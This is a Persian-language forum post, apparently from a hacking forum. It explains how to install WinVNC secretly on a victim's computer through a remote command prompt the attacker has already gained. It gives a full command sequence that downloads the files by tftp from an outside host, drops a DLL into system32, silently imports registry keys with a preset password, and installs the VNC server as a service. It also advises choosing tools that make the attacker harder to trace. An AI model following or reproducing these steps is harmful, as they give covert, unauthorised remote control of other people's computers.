اطلاعیه

Collapse
No announcement yet.

install VNC via a remote command prompt

Collapse
X

• Filter
  • زمان
  • Show
Clear All
new posts

• install VNC via a remote command prompt

How to install VNC via a remote command prompt

VNC چيست؟

VNC يک نرم افزار Remote desktop است که به قول معروف ميتونين با نصب اون روی يک سيستم از هر جای دنيا به اون کامپيوتر وصل بشين به گونه ای که انگار پشتش نشستين.

چرا VNC :

برای هک کردن بهتره از ابزارهايي استفاده کنيد که illegal نباشن تا امکان رديابی شما توسط Anti Hacker ها کمتر بشه برای اين کار من اين نرم افزار رو معرفی ميکنم.

بزرگترين مشکل:

بزرگترين مشکل اينه که چه جوری اينو روی کامپيوتر هدف نصب کنيم به گونه ای که طرف مقابل نفهمه

راه حل:

برای اين کار کافيه شما از کامپيوتر طرف مقابل يک کامند پرامت داشته باشين که بعدآ طريقه رسيدن به اين نقطه رو در سری مقالات آموزش سرور هکينگ ميگم.

در ابتدا نرم افزار WinVnc را از اينجا دون لود کنيد .

WINVNC

حال شما بايد اين 4 تا فايل رو بفرستين به کامپيوتر طرف برای اين کار از TFTP Server استفاده کنيد .

tftp -i guh.nu GET /vnc

سپس فايل omnithread_rt.dll را به شاخه %systemroot%\system32 کپی کنيد

حالا بايد کليدهای مربوط به اين نرم افزار را به registry اين کامپيوتر اضافه کنبد برای اين کار از دستور

regedit -s vnc.reg

استفاده کنيد. در آخر.

Winvnc را با کماند –install اجرا کنيد . کل دستوراتی را که بايد بر روی کامپيوتر هدف Type کنيد بدين شکل ميباشند.

کد:
    pushd %systemroot%
    cd “\Program Files”
    mkdir vnc
    cd vnc
    tftp -i guh.nu GET /vnc/* 
    move omnithread_rd.dll %systemroot%\system32
    regedit -s vnc.reg 
    winvnc –install
    winvnc

حلا کافيه با vncviewer به کامپيوتر هدف وصل بشين . تنها نکتهای را که بايد مد نظر قرار بدين اين است که خود VNCSERVER بدون ست کردن پسورد که به ريجيستری منتقل ميشود اجازه کانکت Viewer را نميدهد برای همين در فايل VNC.reg من يک پسورد پيش فرض ست کردم که 123456 ميباشد اگر خواستين پسورد را عوض کنيد WINVNC را روی سيستم خودتون نصب کنيد بعد اونجا Password رو عوض کنيد . حالا کافيه اين کليد را export کنيد و از آن به جای فايل .reg من استفاده کنيد.
    ...
Working...
X